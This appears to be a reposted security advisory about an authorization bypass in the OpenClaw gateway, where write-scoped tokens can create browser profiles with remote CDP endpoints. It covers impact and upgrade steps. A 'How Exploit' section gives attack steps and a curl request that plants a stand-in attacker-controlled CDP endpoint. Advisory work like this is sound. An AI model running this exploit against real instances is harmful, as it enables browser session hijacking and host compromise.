OpenClaw, Authorization Bypass, GHSA-vmhq-cqm9-6p7q (High)

Listen to this Post

The vulnerability stems from an authorization mismatch within the OpenClaw gateway, specifically affecting the browser profile management routes . An authenticated user possessing only the `operator.write` scope could exploit the `browser.request` permission to access endpoints designed for persisting browser profile configurations to disk . In practice, this flaw exposed an administrative-level write primitive through the `/profiles/create` endpoint . By leveraging this, an attacker with write-scoped access could create or modify browser profiles without holding the requisite `operator.admin` scope . This allowed the injection of attacker-chosen remote Chrome DevTools Protocol (CDP) endpoints into the configuration . The issue is classified under CWE-863, indicating incorrect authorization . The vulnerability affects all OpenClaw versions up to and including 2026.3.8 . It was fixed in version 2026.3.11, with later releases like 2026.3.12 also containing the patch . The patch enforces the correct admin boundary for browser profile creation and includes regression tests to prevent regression .
Platform: OpenClaw
Version: <= 2026.3.8
Vulnerability: Authorization mismatch
Severity: High
Date: 2026-03-13

Prediction: Patched 2026-03-13

What Undercode Say:

Analytics

This vulnerability highlights a critical flaw in the gateway’s authorization logic, where the `browser.request` permission was incorrectly mapped to allow `operator.write` users to access admin-level browser profile persistence functions . The primary risk is privilege escalation, allowing an authenticated attacker to persist arbitrary configurations and set malicious remote CDP endpoints, potentially leading to browser session hijacking or further system compromise . The vulnerability is specific to the NPM ecosystem distribution of OpenClaw . The fix, implemented in version 2026.3.11, introduces stricter authorization checks, ensuring that only users with the `operator.admin` scope can modify and persist browser profiles .

How Exploit:

1. Identify a target OpenClaw instance with version <= 2026.3.8.
2. Obtain a valid API token with 'operator.write' scope.
3. Use the token to make an authenticated request to the vulnerable /profiles/create endpoint via the browser.request permission.
4. Craft a payload to create a new browser profile with a malicious remote CDP endpoint.
Example using curl (conceptual):
curl -X POST https://target-openclaw-instance.com/profiles/create \
-H "Authorization: Bearer <operator_write_token>" \
-H "Content-Type: application/json" \
-d '{
"profileName": "malicious-profile",
"cdpEndpoint": "wss://attacker-controlled-server.com/endpoint"
}'
5. The profile is persisted to disk, allowing the attacker to intercept or manipulate browser sessions.

Protection from this CVE

1. Immediately upgrade OpenClaw to version 2026.3.11 or later.
npm update openclaw@latest
Or for a specific patched version:
npm install [email protected]
2. Verify the installed version:
openclaw --version
Expected output: 2026.3.11 or higher
3. If immediate upgrade is not possible, as a workaround, review and restrict 'operator.write' tokens.
Avoid issuing write-only tokens to untrusted clients or for sensitive operations .
4. Audit current browser profiles for any unauthorized or suspicious remote CDP endpoints:
Check configuration files or use CLI tools to list profiles.

Impact

A successful exploit allows an attacker with limited write access to persist malicious browser configurations on the server . By setting a rogue remote CDP endpoint, the attacker can potentially:
– Intercept, read, and modify all browser traffic and data from sessions using the compromised profile.
– Execute arbitrary commands in the context of the browser, leading to further compromise of the host system or lateral movement within the network .
– This effectively bypasses the intended admin-only protection for browser settings, leading to unauthorized configuration changes that survive restarts .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top